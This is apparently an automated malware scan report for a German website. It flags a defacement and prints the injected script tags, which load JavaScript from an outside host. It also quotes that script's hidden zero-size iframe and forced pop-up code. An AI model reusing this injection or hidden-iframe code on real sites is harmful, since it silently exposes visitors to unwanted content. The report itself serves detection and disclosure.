Scanned pages/files
Request | Server response | Status |
http://www.diezwoo.de/ | 200 OK Content-Length: 18426 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: !--Hacked by -- <script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div> <script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div> <script src="/images/stories/a.js"></script> <!--Hacked by --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-de" lang="de-de" > <head> <base href="http://www.diezwoo.de/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" conten ...[21275 bytes skipped]... | ||
http://narc.ir/mtp1376/secapps/a.js | 200 OK Content-Length: 2188 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="0" height="0" src="http://www.secapps.org/"></iframe>'); var needpopupfck = 1; var vc_cn = "__popUp"; var link = "http://www.secapps.org/"; if (readCookiefck(vc_cn)&&readCookiefck(vc_cn)==2) { needpopupfck = 0; }else{ needpopupfck = 1; } var Page_Popped_fck = false; var Page_Loaded_fck = false; var Page_Enter_fck; if (needpopupfck == 1) { InitPopfck(); } function InitPopf window.open('javascript:void(0)', '_parent','toolbar=1,location=1,directories=1,status=1,menubar=1,scrollbars=1,resizable=1'); window.focus(); if(window.open(link,'_blank','toolbar=1,scrollbars=1,location=1,statusbar=1,menubar=1,resizable=1')){ window.focus(); IncrementCountfck(); } else { window.focus(); if (Page_Loaded_fck) initAdLayer(); else XBrowserAddHandlerPops(window, "load", "initAdLayer") } } } Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.secapps.org/ <iframe width="0" height="0" src="http://www.secapps.org/"> Hidden iFrame found. size: 0x0 src: http://rahweb.com/ <iframe width="0" height="0" src="http://rahweb.com/"> | ||
http://www.diezwoo.de/images/stories/a.js | 200 OK Content-Length: 1912 Content-Type: application/javascript | clean |
http://www.diezwoo.de/media/system/js/caption.js | 200 OK Content-Length: 1721 Content-Type: application/javascript | clean |
http://www.diezwoo.de/modules/mod_gk_news_image_1/js/engine_compress.js | 200 OK Content-Length: 6639 Content-Type: application/javascript | clean |
http://www.diezwoo.de/modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=1000&animation_interval=5000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=000000&text_block_opacity=0.50&thumbnail_width=25&thumbnail_margin=4&thumbnail_border=2&thumbnail_border_color=FFFFFF&thumbnail_border_color_inactive=000000&interface_x=0&interface_y=20&clickable_slides=1 | 200 OK Content-Length: 524 Content-Type: text/javascript | clean |
http://www.diezwoo.de/plugins/content/jwsigpro/lytebox/german/lytebox.php | 200 OK Content-Length: 32027 Content-Type: text/javascript | clean |
http://www.diezwoo.de/leistungen | 200 OK Content-Length: 24576 Content-Type: text/html | clean |
http://www.diezwoo.de/modules/mod_funkyslide/js/funkyslide.js | 200 OK Content-Length: 13423 Content-Type: application/javascript | clean |
http://www.diezwoo.de/modules/mod_yoo_accordion/mod_yoo_accordion.js | 200 OK Content-Length: 1175 Content-Type: application/javascript | clean |
http://www.diezwoo.de/./index.php | 200 OK Content-Length: 18437 Content-Type: text/html | clean |
http://www.diezwoo.de/printmedien | 200 OK Content-Length: 23167 Content-Type: text/html | clean |
http://www.diezwoo.de/printmedien/61-news2 | 200 OK Content-Length: 24081 Content-Type: text/html | clean |
http://www.diezwoo.de/archiv | 200 OK Content-Length: 24480 Content-Type: text/html | clean |
http://www.diezwoo.de/archiv/1/61-news2 | 200 OK Content-Length: 24137 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: diezwoo.de
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: diezwoo.de
Referer: http://www.google.com/search?q=diezwoo.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=diezwoo.de
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://diezwoo.de/
Result: diezwoo.de is not infected or malware details are not published yet.